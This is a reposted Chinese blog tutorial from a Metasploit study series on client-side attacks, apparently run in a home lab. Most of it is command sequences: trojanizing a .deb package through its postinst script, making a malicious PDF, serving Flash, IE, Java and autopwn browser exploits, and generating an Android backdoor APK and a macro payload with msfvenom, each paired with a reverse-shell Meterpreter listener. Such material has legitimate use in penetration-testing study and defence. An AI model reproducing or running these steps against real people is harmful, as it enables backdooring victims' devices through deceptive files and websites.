ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

MSF学习(11)客户端渗透

2020-05-22 11:56:34  阅读:446  来源: 互联网

标签:11 multi adobe windows exploit 客户端 MSF browser msf5


十:客户端渗透

社会工程学,进而渗透线上业务网络

含有漏洞利用代码的web站点

含有漏洞利用代码的doc,pdf等文档

诱骗被害者执行payload

1:诱骗被害者执行payload(windows)

可以自己学习

这个我没有环境,没办法了,可以去学习下msfvenom

 

 

 

 

2:诱骗被害者执行payload(liunx deb安装包)

下载deb包,再在文件下插入payload,诱导执行

Deb文件都在这个目录下

 

 

 

 

 

 

 

 

root@kali:/var/cache/apt/archives# apt-get --download-only install freesweep

root@kali:/var/cache/apt/archives# cp freesweep_1.0.1-1_amd64.deb /root/

root@kali:/var/cache/apt/archives# cd 

root@kali:~# dpkg -x freesweep_1.0.1-1_amd64.deb free

root@kali:~# cd free

root@kali:~/free# mkdir DEBIAN    

root@kali:~/free# cd DEBIAN/

root@kali:~/free/DEBIAN# vi control(写入版本信息等)

root@kali:~/free/DEBIAN# vi postinst(写入powershell)

 

 

然后利用payload

 

 

   

执行再打包

3:利用Acrobat reader 漏洞执行payload   

(1)构造pdf文件 Windows  XP

 

 

 

msf5 > use exploit/windows/fileformat/adobe_utilprintf 

msf5 exploit(windows/fileformat/adobe_utilprintf) > set lhost 192.168.1.10

msf5 exploit(windows/fileformat/adobe_utilprintf) > exploit

 

 

 

把pdf压缩再移到本机网页上

 

 

 

 

从网站中下载192.1.1.10/1.zip

使用模块监听

msf5 exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tc

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > exploit

 

 

 

在windowsXP打开pdf即可得到shell

 

 

 

得到shell,

迁移进程到系统进程,防止进程被关闭

 

 

 

 

 

Adobe要小于8.1.3

(2)构造恶意网站

msf5 exploit(windows/fileformat/adobe_utilprintf) > use exploit/windows/browser/adobe_utilprintf 

msf5 exploit(windows/browser/adobe_utilprintf) > show options

msf5 exploit(windows/browser/adobe_utilprintf) > set srvport 80(处理下端口,不然可能会占用)

msf5 exploit(windows/browser/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(windows/browser/adobe_utilprintf) > set lhost 192.168.1.10

msf5 exploit(windows/browser/adobe_utilprintf) > set URIPATH /

可以设置根网址,不设置的话会随机字符串

msf5 exploit(windows/browser/adobe_utilprintf) > exploit

点击即可

 

 

 

  拿到shell  

 

 

 

如果报错则杀进程重来

lsof -i:port(端口):查看端口使用情况

Kill -9 (进程pid):杀死端口进程

meterpreter > getpid

meterpreter > ps

meterpreter > migrate 716

meterpreter > bgrun vnc

 

4:使用flash插件漏洞执行payload

(1)

msf5 >  use exploit/multi/browser/adobe_flash_hacking_team_uaf(针对flash18.194)

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show options

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set srvport 7498

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set URIPATH /

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lhost 192.168.1.10

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set target 0

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > exploit

 

 

 

 

(2)18.203

msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > use exploit/multi/browser/adobe_flash_opaque_background_uaf

 

差不多,都是,不浪费时间了,注意版本问题

 

 

 

 

 

(3) 浏览器漏洞利用模块打包   

模块会自动指定payload,会自动使用漏洞利用模块

msf5 > use auxiliary/server/browser_autopwn

msf5 auxiliary(server/browser_autopwn) > show options

msf5 auxiliary(server/browser_autopwn) > set URIPATH /

msf5 auxiliary(server/browser_autopwn) > set lhost 192.168.1.10

msf5 auxiliary(server/browser_autopwn) > exploit          

 

 

 

 

 

20个模块已被利用,然后会再进行一个一个的试

Windows7访问192.168.1.10:8080

可以看到已经开始了

  

 

 

 

5:利用ie浏览器漏洞执行payload

msf5 > use exploit/windows/browser/ms14_064_ole_code_execution

msf5 exploit(windows/browser/ms14_064_ole_code_execution) > show options

 

 

 

 

 

 

 

 

 

 

得到shell即可

 

 

6:利用JRE漏洞执行payload(1.6,1.7版本)

(1)

msf5 > use exploit/multi/browser/java_jre17_driver_manager

msf5 exploit(multi/browser/java_jre17_driver_manager) > show options

 

 

 

(2)

msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/browser/java_jre17_jmxbean

msf5 exploit(multi/browser/java_jre17_jmxbean) > show options

 

 

 

(3)

msf5 exploit(multi/browser/java_jre17_jmxbean) > use exploit/multi/browser/java_jre17_reflection_types

msf5 exploit(multi/browser/java_jre17_reflection_types) > show options

 

 

 

 

 

 

 

 

7:生成安卓后门程序

msf5 > use payload/android/meterpreter/reverse_tcp

 

 

 

我没有进行成功所以找了一个来测试

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

 

(1)生成安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 R > /root/kk.apk

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.1.10

msf5 exploit(multi/handler) > set lport 5555

msf5 exploit(multi/handler) > exploit

安装打开安卓软件即可,当然没有免杀,所有需要允许安装

效果如下

但权限不高

 

 

 

参考:https://www.cnblogs.com/hkleak/p/4852057.html

 

 

 

 

 

 

 

 

 

 

8:VBScript感染方式

利用宏感染word,excel文档

可以复现一下https://www.jianshu.com/p/8ca521439792

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=3333 -e x86/shikata_ga_nai -f vba-exe

 

分为两步

设置监听和payload,把防火墙关了,直接感染了windows10

权限好像不高,需要提权

 

 

 

 

 

标签:11,multi,adobe,windows,exploit,客户端,MSF,browser,msf5
来源: https://www.cnblogs.com/kyx599/p/12936275.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有